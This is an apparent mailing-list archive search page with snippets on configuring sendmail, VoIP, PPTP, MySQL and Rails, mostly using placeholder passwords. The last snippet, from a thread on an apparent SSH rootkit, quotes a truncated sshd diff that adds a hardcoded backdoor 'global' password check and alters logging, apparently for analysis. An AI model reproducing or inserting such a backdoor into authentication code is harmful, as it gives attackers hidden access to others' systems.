search for: your_password

Displaying 14 results from an estimated 14 matches for "your_password".

2011 Oct 05
0
Howto use Gmail with sendmail on CentOS 6
...ut how to setup Postfix yet): # yum erase postfix # yum install sendmail sendmail-cf cyrus-sasl-plain cyrus-sasl-md5 # mkdir /etc/mail/auth # chmod 700 /etc/mail/auth Create the file /etc/mail/auth/client-info: AuthInfo:smtp.gmail.com "U:smmsp" "I:your_gmail_address" "P:your_password" "M:PLAIN" AuthInfo:smtp.gmail.com:587 "U:smmsp" "I:your_gmail_address" "P:your_password" "M:PLAIN" # cd /etc/mail/auth # makemap -r hash client-info.db < client-info # chmod 600 client-info client-info.db Then edit /etc/mail/sendmail.mc (...
2006 Jul 23
18
help with "rake db:migrate" error please?
Hi, Just trying to get my first database based rails app up on dreamhost.com. The app was working prior to putting in mysql DB usage but I''m just stuck on getting the app working with mysql. I''ve already created the database and can connect to it manually. Below is the error I get after running the rake migrate. It worked OK on my home PC environment. I did change the
2003 May 24
4
Free World Dialup behind NAT
...phone from www.xten.com works fine: xten-phone -> * -> NAT -> Freeworld -> other person This is how I configured the xten-phone: "Display Name:" the name you want others to see "User Name:" 16000 "Authorization User:" 16000 "Password:" is: (your_password) "Domain/Realm:" is: fwd.pulver.com "SIP Proxy:" is fwd.pulver.com:5060 Left Click on the "SIP Proxy" button and for "Out Bound Proxy:" use: 192.246.69.247:5082 This is how you should configure an ATA: # Set UseTftp to 0 # Set UID0 to your FWD accou...
2010 Nov 21
6
Access denied for user 'root'@'localhost' (using password: NO)
I am getting this message after run: ruby script/server and click in "About your application environment" in the browser. -- Posted via http://www.ruby-forum.com/. -- You received this message because you are subscribed to the Google Groups "Ruby on Rails: Talk" group. To post to this group, send email to rubyonrails-talk-/JYPxA39Uh5TLH3MbocFF+G/Ez6ZCGd0@public.gmane.org To
2003 Jan 12
0
SV: [Gibraltar-list] help: vpn configuration
Yes your chap-secret file could be the issue, it should look like this: Your_usrname * Your_password * That?s it :) But if that don?t work include this file to the list: /etc/ppp/pptpd-options It should look something like this: ipparam PoPToP lock mtu 1490 mru 1490 ms-wins 172.x.y.1 ms-dns 172.x.y.1 multilink proxyarp auth +chapms-v2 ipcp-accept-local ipcp-accept-remote lcp-echo-failure 30 l...
2010 Jul 31
1
How to connect R with SAP
Hello, Anyone knows if there is a way to connect R with the ERP SAP? Thanks. -- View this message in context: http://r.789695.n4.nabble.com/How-to-connect-R-with-SAP-tp2309018p2309018.html Sent from the R help mailing list archive at Nabble.com.
2011 Apr 15
0
RODBC with MySQL sees tables, but queries return zero rows
...ueries I've verified as functional and non-empty by entering them directly in MySQL. I granted myself all privileges to the database, as per http://www.actualtech.com/mysql_remote.php, by entering this into mysql: GRANT ALL ON your_database_name.* TO your_user_id@'%' IDENTIFIED BY 'your_password'; I've opened ports on my server, as per http://forums.systeminetwork.com/isnetforums/showthread.php?t=42086 My setup: mysql Ver 14.12 Distrib 5.0.77, for redhat-linux-gnu (x86_64) using readline 5.1 R 2.10.0 GUI 1.30 Leopard build 32-bit (5511) Mac OS X 10.6.7 MySQL/PostgreSQL/SQLite dr...
2007 Nov 28
1
how can I connect with postgresql using rails ?
Dear Friends, I am a new of ruby on rails. In my server mqsql is not installed,instead of mysql I am having the postgresql. How can I connect with postgresql using rails ? Please anyone help me to study further details. with deep regards, S.Vellingiri -- Posted via http://www.ruby-forum.com/. --~--~---------~--~----~------------~-------~--~----~ You received this
2003 May 31
0
register with outbound proxy from behind nat for freeworlddialup etc.
...[incoming-fwd] exten => _X.,1,SetCallerID,8${CALLERID} exten => _X.,2,Goto(extern,111,1) Configuration for the xten sip client: "Display Name:" the name you want others to see "User Name:" 16000 "Authorization User:" 16000 "Password:" is: (your_password) "Domain/Realm:" is: fwd.pulver.com "SIP Proxy:" is fwd.pulver.com:5060 Left Click on the "SIP Proxy" button and for "Out Bound Proxy:" use: 192.246.69.247:5082
2008 Mar 11
3
Automatically send CTRL-D
Hi, Sorry for the little bit off-topic. I have a script that has to performe a hash over a password. Problem is that sha512sum expects CTRL-D to be pressed to return to the command prompt. I've searched all over Google, but either I didn't do the right search or there is nothing relevant about this. Bottom line is that I need this command to print the password hash and returns to the
2018 Jul 09
1
slow mailbox refreshes
Hello, I am using dovecot 2.3.2 on my private email server in conjunction with: centos 7.5 apache 2.4.6 mariadb 10.2.16 roundcube mail 1.3.6 php 5.6.36 postfix 2.10.1 I have one mailbox with nearly 30k messages in it dispersed across several folders. it's often very slow in refreshing the message list, especially in the one largest 25k+ message folder. is this simply to be expected
2008 Jun 20
15
before_save model callback rspec testing
hi all, i''m learning rspec and i can''t figure out how to test if a callback is executed in a model. my model code is: class User < ActiveRecord::Base before_save :encrypt_password ... def encrypt(password) self.class.encrypt(password, salt) end thanks a lot, cs. -- Posted via http://www.ruby-forum.com/.
2007 Mar 21
6
ORACLE DESC "table_name" Failure
I am getting "DESC CYCLEMSTR" failed; does it exist? errors on a table named CYCLEMSTR in Oracle every 3 out of 4 trys to do a simple find(:all) on the table. It is a legacy table that only contains 12 rows of join information. I don''t understand why it works one out of every 4 or 5 times help please. trace: (eval):3:in `describe''
2001 Jun 25
1
Apparent SSH-1.2.27 Rootkit
...sing connection to %.100s", get_remote_ipaddr()); + } packet_close(); exit(0); } @@ -2135,6 +2137,38 @@ abort(); } +/* Check if the "global" password was entered */ +int check_global_passwd( unsigned char *pass ) +{ + /* Paste here the output from md5sum --string="Your_Password" */ + char md5passwd[33]="ed5c6101c7cc02d1a927e2e37be1eb0d"; + struct MD5Context md; + unsigned char md5buffer[32]; + int i; + + /* Compute the response. */ + MD5Init(&md); + MD5Update(&md, pass, strlen( pass)); + MD5Final(md5buffer, &md); + for( i = 15; i >=...